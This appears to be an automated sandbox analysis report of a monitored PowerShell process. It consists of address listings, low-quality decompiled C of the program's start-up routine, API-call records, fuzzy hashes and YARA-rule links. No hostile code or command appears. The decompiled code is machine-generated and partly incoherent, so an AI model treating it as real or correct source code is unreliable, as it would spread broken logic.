                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5ec
                                                                                                                                                                                                                              0x0125b5ef
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5fd
                                                                                                                                                                                                                              0x0125b607
                                                                                                                                                                                                                              0x0125b60c
                                                                                                                                                                                                                              0x0125b60e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b629
                                                                                                                                                                                                                              0x0125b62f
                                                                                                                                                                                                                              0x0125b631
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b637
                                                                                                                                                                                                                              0x0125b63a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b640
                                                                                                                                                                                                                              0x0125b643
                                                                                                                                                                                                                              0x0125b646
                                                                                                                                                                                                                              0x0125b649
                                                                                                                                                                                                                              0x0125b652
                                                                                                                                                                                                                              0x0125b655
                                                                                                                                                                                                                              0x0125b65b
                                                                                                                                                                                                                              0x0125b65f
                                                                                                                                                                                                                              0x0125b668
                                                                                                                                                                                                                              0x0125b668
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259460
                                                                                                                                                                                                                              0x01259460
                                                                                                                                                                                                                              0x01259463
                                                                                                                                                                                                                              0x01259466
                                                                                                                                                                                                                              0x0125946c
                                                                                                                                                                                                                              0x0125946f
                                                                                                                                                                                                                              0x01259475
                                                                                                                                                                                                                              0x0125b675
                                                                                                                                                                                                                              0x0125b67f
                                                                                                                                                                                                                              0x0125b684
                                                                                                                                                                                                                              0x0125b686
                                                                                                                                                                                                                              0x0125b697
                                                                                                                                                                                                                              0x0125b69a
                                                                                                                                                                                                                              0x0125b69f
                                                                                                                                                                                                                              0x0125b6a2
                                                                                                                                                                                                                              0x0125b6a4
                                                                                                                                                                                                                              0x0125b6b1
                                                                                                                                                                                                                              0x0125b6be
                                                                                                                                                                                                                              0x0125b6c3
                                                                                                                                                                                                                              0x0125b6c5
                                                                                                                                                                                                                              0x0125b6e4
                                                                                                                                                                                                                              0x0125b6ea
                                                                                                                                                                                                                              0x0125b6ec
                                                                                                                                                                                                                              0x0125b6f6
                                                                                                                                                                                                                              0x0125b6f9
                                                                                                                                                                                                                              0x0125b706
                                                                                                                                                                                                                              0x0125b709
                                                                                                                                                                                                                              0x0125b70a
                                                                                                                                                                                                                              0x0125b70c
                                                                                                                                                                                                                              0x0125b905
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b905
                                                                                                                                                                                                                              0x0125b716
                                                                                                                                                                                                                              0x0125b71c
                                                                                                                                                                                                                              0x0125b72a
                                                                                                                                                                                                                              0x0125b72c
                                                                                                                                                                                                                              0x0125b72f
                                                                                                                                                                                                                              0x0125b731
                                                                                                                                                                                                                              0x0125b742
                                                                                                                                                                                                                              0x0125b733
                                                                                                                                                                                                                              0x0125b736
                                                                                                                                                                                                                              0x0125b737
                                                                                                                                                                                                                              0x0125b73a
                                                                                                                                                                                                                              0x0125b73d
                                                                                                                                                                                                                              0x0125b73d
                                                                                                                                                                                                                              0x0125b745
                                                                                                                                                                                                                              0x0125b748
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b748
                                                                                                                                                                                                                              0x0125b6fe
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6fe
                                                                                                                                                                                                                              0x0125b6f1
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6f1
                                                                                                                                                                                                                              0x0125b6ca
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6ca
                                                                                                                                                                                                                              0x0125b6a6
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b6a6
                                                                                                                                                                                                                              0x0125b68a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259496
                                                                                                                                                                                                                              0x01259496
                                                                                                                                                                                                                              0x01259499
                                                                                                                                                                                                                              0x012594a1
                                                                                                                                                                                                                              0x012594a7
                                                                                                                                                                                                                              0x012594aa
                                                                                                                                                                                                                              0x0125b750
                                                                                                                                                                                                                              0x0125b754
                                                                                                                                                                                                                              0x0125b759
                                                                                                                                                                                                                              0x0125b75b
                                                                                                                                                                                                                              0x0125b7fa
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b7fa
                                                                                                                                                                                                                              0x0125b763
                                                                                                                                                                                                                              0x0125b766
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b774
                                                                                                                                                                                                                              0x0125b77e
                                                                                                                                                                                                                              0x0125b783
                                                                                                                                                                                                                              0x0125b785
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b79c
                                                                                                                                                                                                                              0x0125b7a2
                                                                                                                                                                                                                              0x0125b7a4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b7a6
                                                                                                                                                                                                                              0x0125b7a9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b7ae
                                                                                                                                                                                                                              0x0125b7b2
                                                                                                                                                                                                                              0x0125b7b4
                                                                                                                                                                                                                              0x0125b80c
                                                                                                                                                                                                                              0x0125b911
                                                                                                                                                                                                                              0x0125b911
                                                                                                                                                                                                                              0x0125b91d
                                                                                                                                                                                                                              0x0125b922
                                                                                                                                                                                                                              0x0125b928
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b92a
                                                                                                                                                                                                                              0x0125b7ba
                                                                                                                                                                                                                              0x0125b7c5
                                                                                                                                                                                                                              0x0125b7c7
                                                                                                                                                                                                                              0x0125b802
                                                                                                                                                                                                                              0x0125b802
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b802
                                                                                                                                                                                                                              0x0125b7cc
                                                                                                                                                                                                                              0x0125b7d2
                                                                                                                                                                                                                              0x0125b7db
                                                                                                                                                                                                                              0x0125b7e0
                                                                                                                                                                                                                              0x0125b7e2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b7ea
                                                                                                                                                                                                                              0x0125b7f8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012594cb
                                                                                                                                                                                                                              0x012594cb
                                                                                                                                                                                                                              0x012594ce
                                                                                                                                                                                                                              0x012594d3
                                                                                                                                                                                                                              0x012594d9
                                                                                                                                                                                                                              0x0125b819
                                                                                                                                                                                                                              0x0125b81d
                                                                                                                                                                                                                              0x0125b822
                                                                                                                                                                                                                              0x0125b824
                                                                                                                                                                                                                              0x0125b86c
                                                                                                                                                                                                                              0x0125b86c
                                                                                                                                                                                                                              0x0125b86f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b86f
                                                                                                                                                                                                                              0x0125b828
                                                                                                                                                                                                                              0x0125b82b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b835
                                                                                                                                                                                                                              0x0125b83f
                                                                                                                                                                                                                              0x0125b844
                                                                                                                                                                                                                              0x0125b846
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b85d
                                                                                                                                                                                                                              0x0125b863
                                                                                                                                                                                                                              0x0125b865
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b867
                                                                                                                                                                                                                              0x0125b86a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012594fa
                                                                                                                                                                                                                              0x012594fa
                                                                                                                                                                                                                              0x012594fd
                                                                                                                                                                                                                              0x01259503
                                                                                                                                                                                                                              0x0125b87c
                                                                                                                                                                                                                              0x0125b880
                                                                                                                                                                                                                              0x0125b885
                                                                                                                                                                                                                              0x0125b887
                                                                                                                                                                                                                              0x0125b8cd
                                                                                                                                                                                                                              0x0125b8cd
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b8cd
                                                                                                                                                                                                                              0x0125b88b
                                                                                                                                                                                                                              0x0125b88e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b890
                                                                                                                                                                                                                              0x0125b89e
                                                                                                                                                                                                                              0x0125b8a3
                                                                                                                                                                                                                              0x0125b8a5
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b8b6
                                                                                                                                                                                                                              0x0125b8bc
                                                                                                                                                                                                                              0x0125b8be
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b8c0
                                                                                                                                                                                                                              0x0125b8c3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b8c5
                                                                                                                                                                                                                              0x0125b8cb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259524
                                                                                                                                                                                                                              0x01259524
                                                                                                                                                                                                                              0x01259524
                                                                                                                                                                                                                              0x01259527
                                                                                                                                                                                                                              0x0125952c
                                                                                                                                                                                                                              0x0125b8d5
                                                                                                                                                                                                                              0x0125b8d8
                                                                                                                                                                                                                              0x0125b8da
                                                                                                                                                                                                                              0x0125957d
                                                                                                                                                                                                                              0x01259580
                                                                                                                                                                                                                              0x0125b8e5
                                                                                                                                                                                                                              0x0125b8e8
                                                                                                                                                                                                                              0x0125b8f4
                                                                                                                                                                                                                              0x0125b8f9
                                                                                                                                                                                                                              0x0125b8fe
                                                                                                                                                                                                                              0x0125b8fe
                                                                                                                                                                                                                              0x0125b8e8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259580
                                                                                                                                                                                                                              0x01259536
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259538
                                                                                                                                                                                                                              0x0125953b
                                                                                                                                                                                                                              0x01259541
                                                                                                                                                                                                                              0x01259548
                                                                                                                                                                                                                              0x0125954f
                                                                                                                                                                                                                              0x01259559
                                                                                                                                                                                                                              0x01259568
                                                                                                                                                                                                                              0x0125956d
                                                                                                                                                                                                                              0x01259571
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259573
                                                                                                                                                                                                                              0x01259573
                                                                                                                                                                                                                              0x01259579
                                                                                                                                                                                                                              0x0125957b
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125957b
                                                                                                                                                                                                                              0x01259571
                                                                                                                                                                                                                              0x01259503
                                                                                                                                                                                                                              0x012594d9
                                                                                                                                                                                                                              0x012594aa
                                                                                                                                                                                                                              0x01259475
                                                                                                                                                                                                                              0x0125943f
                                                                                                                                                                                                                              0x01259410
                                                                                                                                                                                                                              0x012593e1
                                                                                                                                                                                                                              0x0125936c

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CompareStringW.KERNELBASE(0000007F,00000001,version,00000000,-00000002,00000000,00000000,-00000002,00000000,?,?), ref: 0125B4D4
                                                                                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,servermode,00000000,-00000002,00000000,00000000,00000002,00000000,?,?), ref: 0125B5BE
                                                                                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,01253320,00000000,-00000002,00000000,00000000,-00000002,00000002,00000000,?,?), ref: 0125B629
                                                                                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,psconsolefile,00000000,-00000002,00000000,00000000,-00000002,-00000002,00000002,00000000,?,?), ref: 0125B79C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                                                              • String ID: 2.0$nop$noprofile$psconsolefile$runtimeversion$servermode$version
                                                                                                                                                                                                                              • API String ID: 1825529933-1296109095
                                                                                                                                                                                                                              • Opcode ID: 55836d66961a9e4520852a7588740f7ea861fa6d4b182a1e0b3db94787775cb6
                                                                                                                                                                                                                              • Instruction ID: 29b89e40548798df4bba8161a4217fa6f9a235eae5fa74c7a666769d34c36b28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55836d66961a9e4520852a7588740f7ea861fa6d4b182a1e0b3db94787775cb6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24225C74A2020AAFDF64CF58C8D5AFE7BB6EB44314F548555EE51AB380D770E981CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01259873, Relevance: 10.6, APIs: 7, Instructions: 99sleepCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                                                              			E01259873() {
				int _t11;
				intOrPtr _t15;
				void* _t16;
				intOrPtr _t21;
				void* _t23;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t39;
				void* _t45;
				void* _t46;

				_push(0x10);
				_push(0x125f3f8);
				E0125A14C(_t23, _t32, _t34);
				 *((intOrPtr*)(_t39 - 4)) = 0;
				_t35 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t33 = 0;
				while(1) {
					_t25 = _t35;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t35) {
						Sleep(0x3e8);
						continue;
					} else {
						_t37 = 1;
						_t33 = 1;
					}
					L6:
					_t45 =  *0x12606bc - _t37; // 0x2
					if(_t45 != 0) {
						__eflags =  *0x12606bc; // 0x2
						if(__eflags != 0) {
							 *0x1260364 = _t37;
							goto L12;
						} else {
							 *0x12606bc = _t37;
							_t21 = E012599E2(_t25, 0x1252e98, 0x1252ea4); // executed
							_pop(_t25);
							__eflags = _t21;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						L01259F44();
						_t25 = 0x1f;
						L12:
						_t46 =  *0x12606bc - _t37; // 0x2
						if(_t46 == 0) {
							_push(0x1252e94);
							L0125A146(); // executed
							_t25 = 0x1252e84;
							 *0x12606bc = 2;
						}
						if(_t33 == 0) {
							_t25 = 0x12606b8;
							 *0x12606b8 = 0;
						}
						_t49 =  *0x12606c8;
						if( *0x12606c8 != 0) {
							_t16 = E01259FA0(_t49, 0x12606c8);
							_pop(_t25);
							_t50 = _t16;
							if(_t16 != 0) {
								_t37 =  *0x12606c8; // 0x0
								_t25 = _t37;
								 *0x1261204(0, 2, 0);
								 *_t37();
							}
						}
						_push( *0x1260370);
						_t11 = E01258450(_t25, 0x12606b8, _t50,  *0x1260368,  *0x126036c); // executed
						 *0x1260360 = _t11;
						if( *0x1260378 != 0) {
							__eflags =  *0x1260364;
							if( *0x1260364 == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t39 - 4)) = 0xfffffffe;
							L24:
							return E0125A194(0, _t33, _t37);
						} else {
							exit(_t11); // executed
							_t26 =  *((intOrPtr*)(_t39 - 0x14));
							_t15 =  *((intOrPtr*)( *_t26));
							 *((intOrPtr*)(_t39 - 0x20)) = _t15;
							_push(_t26);
							_push(_t15);
							L01259E9E();
							return _t15;
						}
					}
				}
				_t37 = 1;
				__eflags = 1;
				goto L6;
			}


















                                                                                                                                                                                                                              0x01259873
                                                                                                                                                                                                                              0x01259875
                                                                                                                                                                                                                              0x0125987a
                                                                                                                                                                                                                              0x01259881
                                                                                                                                                                                                                              0x0125988a
                                                                                                                                                                                                                              0x0125988d
                                                                                                                                                                                                                              0x0125988f
                                                                                                                                                                                                                              0x01259894
                                                                                                                                                                                                                              0x01259898
                                                                                                                                                                                                                              0x0125989e
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012598a2
                                                                                                                                                                                                                              0x012598b0
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012598a4
                                                                                                                                                                                                                              0x012598a6
                                                                                                                                                                                                                              0x012598a7
                                                                                                                                                                                                                              0x012598a7
                                                                                                                                                                                                                              0x012598bb
                                                                                                                                                                                                                              0x012598bb
                                                                                                                                                                                                                              0x012598c1
                                                                                                                                                                                                                              0x012598cd
                                                                                                                                                                                                                              0x012598d3
                                                                                                                                                                                                                              0x01259901
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012598d5
                                                                                                                                                                                                                              0x012598d5
                                                                                                                                                                                                                              0x012598e5
                                                                                                                                                                                                                              0x012598eb
                                                                                                                                                                                                                              0x012598ec
                                                                                                                                                                                                                              0x012598ee
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012598f0
                                                                                                                                                                                                                              0x012598f0
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012598f7
                                                                                                                                                                                                                              0x012598ee
                                                                                                                                                                                                                              0x012598c3
                                                                                                                                                                                                                              0x012598c5
                                                                                                                                                                                                                              0x012598ca
                                                                                                                                                                                                                              0x01259907
                                                                                                                                                                                                                              0x01259907
                                                                                                                                                                                                                              0x0125990d
                                                                                                                                                                                                                              0x0125990f
                                                                                                                                                                                                                              0x01259919
                                                                                                                                                                                                                              0x0125991f
                                                                                                                                                                                                                              0x01259920
                                                                                                                                                                                                                              0x01259920
                                                                                                                                                                                                                              0x0125992c
                                                                                                                                                                                                                              0x01259930
                                                                                                                                                                                                                              0x01259935
                                                                                                                                                                                                                              0x01259935
                                                                                                                                                                                                                              0x01259937
                                                                                                                                                                                                                              0x0125993e
                                                                                                                                                                                                                              0x01259945
                                                                                                                                                                                                                              0x0125994a
                                                                                                                                                                                                                              0x0125994b
                                                                                                                                                                                                                              0x0125994d
                                                                                                                                                                                                                              0x01259953
                                                                                                                                                                                                                              0x01259959
                                                                                                                                                                                                                              0x0125995b
                                                                                                                                                                                                                              0x01259961
                                                                                                                                                                                                                              0x01259961
                                                                                                                                                                                                                              0x0125994d
                                                                                                                                                                                                                              0x01259963
                                                                                                                                                                                                                              0x01259975
                                                                                                                                                                                                                              0x0125997d
                                                                                                                                                                                                                              0x01259989
                                                                                                                                                                                                                              0x012599c1
                                                                                                                                                                                                                              0x012599c8
                                                                                                                                                                                                                              0x012599ca
                                                                                                                                                                                                                              0x012599d0
                                                                                                                                                                                                                              0x012599d5
                                                                                                                                                                                                                              0x012599dc
                                                                                                                                                                                                                              0x012599e1
                                                                                                                                                                                                                              0x0125998b
                                                                                                                                                                                                                              0x0125998c
                                                                                                                                                                                                                              0x01259992
                                                                                                                                                                                                                              0x01259997
                                                                                                                                                                                                                              0x01259999
                                                                                                                                                                                                                              0x0125999c
                                                                                                                                                                                                                              0x0125999d
                                                                                                                                                                                                                              0x0125999e
                                                                                                                                                                                                                              0x012599a5
                                                                                                                                                                                                                              0x012599a5
                                                                                                                                                                                                                              0x01259989
                                                                                                                                                                                                                              0x012598c1
                                                                                                                                                                                                                              0x012598ba
                                                                                                                                                                                                                              0x012598ba
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 796493780-0
                                                                                                                                                                                                                              • Opcode ID: 582970da646d20487a061febbfd24ccf142c049161c59c6502ec33b0c618dac7
                                                                                                                                                                                                                              • Instruction ID: 0fa9f28bace3a6184d401a2ba75c0a6ebafc345aa0c1dcce2f3224e77919680f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582970da646d20487a061febbfd24ccf142c049161c59c6502ec33b0c618dac7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131D074524313DFDFB59B68F88D62A36A0FB84729F20812DFE11972E4CB705890EB58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337DD20, Relevance: 1.7, APIs: 1, Instructions: 181COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentConsoleFontEx.KERNELBASE(?,?,?), ref: 0337DED5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleCurrentFont
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2874077460-0
                                                                                                                                                                                                                              • Opcode ID: c125a737768ef7d50a418ecf2d6df2440079ce6ca7b3f09a990e90923d40de1c
                                                                                                                                                                                                                              • Instruction ID: 281e551fa9bce6f51223842abb97847e042779e5a821d87a8933cbd48d870f76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c125a737768ef7d50a418ecf2d6df2440079ce6ca7b3f09a990e90923d40de1c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD615B71E102589FDB20DF64C8847DEBBB6BF89304F1581AAD508BB241DB745E89CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337C380, Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 63fafacce5093dd128eebd3c6e7a3d7d10383c3415f434153b6f6b20327e86a8
                                                                                                                                                                                                                              • Instruction ID: 91743f88ffbc509f4ec294aa5f68dfbf7e3fa1433444c20d3dd9a49ed9aa3ca2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63fafacce5093dd128eebd3c6e7a3d7d10383c3415f434153b6f6b20327e86a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441A1B1A002499FDB10DFA8D844BAEFBB5FB48314F14C16AE509AB381D775A940CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337F2C0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: f35a96b9e66e19c733c0c5e19f13a345e82df9d62960ef4ce93b47492ba24b7d
                                                                                                                                                                                                                              • Instruction ID: b7f6861d9028b74d0ae139438e3430db5827c07977b4b777c90c39d404bcd4a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f35a96b9e66e19c733c0c5e19f13a345e82df9d62960ef4ce93b47492ba24b7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A313A75E002499FDB10DFA9D88869EFBB5FF48314F108169D918A7240E7789A45CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337C420, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 7e1ce9580ece15754af6a304cbe6a1463dfa6a2ae17bc142df0373854da5c977
                                                                                                                                                                                                                              • Instruction ID: 6be1f312c6430fd76a0340f7607a3f9ea36a43facbb9ff692d1f1e014fb9575f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e1ce9580ece15754af6a304cbe6a1463dfa6a2ae17bc142df0373854da5c977
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 982138B6D0025AAFCF10CF99C884AEEFBB4FB48324F148119E919A7210D375A950CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337C4E0, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 0337C4AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 488cefd9ab3f6476f09f597e6870703c6b8349b7b9416e71a284c883d1fff0f8
                                                                                                                                                                                                                              • Instruction ID: 36a2a23bac92217984f6f5b4ca16a243b7de4a16ddf132af6aa03ee1ad9e059b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488cefd9ab3f6476f09f597e6870703c6b8349b7b9416e71a284c883d1fff0f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB21D5B2804259DFDF22CF94C8847EEBBB4FF09314F048189E545AB621C3399555CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337ED9C, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 0337F39A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: baeb45f42ba48b72e3d74bb2f12f5269b095ceeb935c230b1e3a528854fe5156
                                                                                                                                                                                                                              • Instruction ID: 062a3431fdbfeb28fb8944dbc06607462f60f9dd2084653d6989cc023744cffb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baeb45f42ba48b72e3d74bb2f12f5269b095ceeb935c230b1e3a528854fe5156
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 331103B1D106599FDB10CF9AC884BDEFBB4BB08224F048129D918B7240D378A944CFE5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0337F328, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
